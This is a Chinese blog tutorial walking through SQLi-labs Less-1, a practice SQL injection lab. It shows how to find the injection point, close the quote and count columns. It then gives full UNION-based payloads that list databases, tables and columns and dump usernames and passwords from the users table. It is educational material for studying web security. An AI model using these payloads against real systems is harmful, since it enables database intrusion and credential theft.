SQL注入练习(Basic Challenges):Less-1 Single qutos - String

题目地址:http://43.247.91.228:84/Less-1/

0x01 先看题目的描述,查找注入点

初始页面

welcome 下面说输入ID作为带有数字值的参数。首先令?id=1尝试下:有显示两列。

?id=1

尝试着让返回页面报错,可以尝试加单引号,双引号,括号等, 发现加单引号报错并返回错误信息。

返回错误信息

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ' '1'' LIMIT 0,1 ' at line 1

这个位置就应该是注入点了。

0x02 分析后台查询语句的结构,使其闭合

不管报错的两端的单引号,只分析'1'' LIMIT 0,1,1和'  是我们输入的,后端代码很可能是

select name,password where id='$id' LIMIT 0,1

我们可控的参数只有$id,所以我们输入数字,加上单引号之后使id闭合之后。加上#(%23或者--+)屏蔽掉原来的' LIMIT 0,1 。 令?id=1' %23, 成功返回结果。

闭合之后显示的结果

0x03 进行联合查询,查看是否能执行查询语句

联合查询要求查询的列数相同,首先得检测列数,有两种方法检测:union select加不同列数的数字和利用order by

1. 利用union select加不同列数的数字

从1列开始,直到列数相同返回正确的显示为止

列数不匹配,显示错误信息
列数匹配,有回显

2. 利用order by进行测试

order by 加数字。如果数字小于列数,不报错;如果数字大于列数,将报错。(不报错的最大数即为列数)猜测一个稍微大点的数字,用二分法可以比较快速的定位到列数。(可以先执行order by 1,如果报错说明语句存在错误)

数字大于列数,报错
数字小于等于列数,不报错

3. 找到列数之后,执行union select查询能否执行函数

我们注意到,使用union select 1,2,3 时,页面将2和3显示了出来。我们用简单函数database(),或者user() 来代替2和3的位置,看是否可以执行函数。

返回了当前数据库和用户名

0x04 爆出所有数据库

这里插入一段前置知识:

1. 数据库存储的结构

层级依次是,数据库>>表>>字段>>值。具体而言,我们的MySQL数据库中一般会包含许多数据库,每个数据库中又会包含几个表,每个表又会有多个字段,字段又会对应多个值。

2. MySQL数据库中的重要表

MySQL数据库中有个重要的information_schema库,库中包含三个重要的表:

♦ SCHEMATA : 这个表包含了所有数据库的名字

♦ TABLES : 这个表包含了所有表的名字

♦ COLUMNS : 这个表包含了所有字段的名字

schemata表,包含所有的数据库
tables表,包含所有的表名
column表,包含了所有的列

我们可以尝试这列出所有的数据库:

payload=?id=-1' union select 1,2,schema_name from information_schema.schemata %23

显示了第一条数据库

上面的操作只显示了数据库的第一条,也许是因为limit 0,1 的原因,限制了只能显示一条,下面我们使用group_concat()函数,把所有结果变成一条。

payload=?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata %23

成功显示出了所有的数据库

0x05 查询当前数据库的所有表

有了上面的经验,我们稍作修改即可查询:

payload=?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() %23

返回当前数据库所有表名

0x06 查询敏感表下的列,寻找敏感字段

我们对users表中的信息比较感兴趣,从users表中进行查询。

payload=?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = database() and table_name='users' %23

查询出敏感字段

0x07 查询敏感字段下的值

payload= ?id=-1' union select 1,group_concat(username),group_concat(password) from users %23

成功读出敏感信息
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 204,293评论 6 478
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 85,604评论 2 381
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 150,958评论 0 337
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,729评论 1 277
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,719评论 5 366
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,630评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,000评论 3 397
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,665评论 0 258
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,909评论 1 299
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,646评论 2 321
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,726评论 1 330
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,400评论 4 321
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,986评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,959评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,197评论 1 260
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 44,996评论 2 349
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,481评论 2 342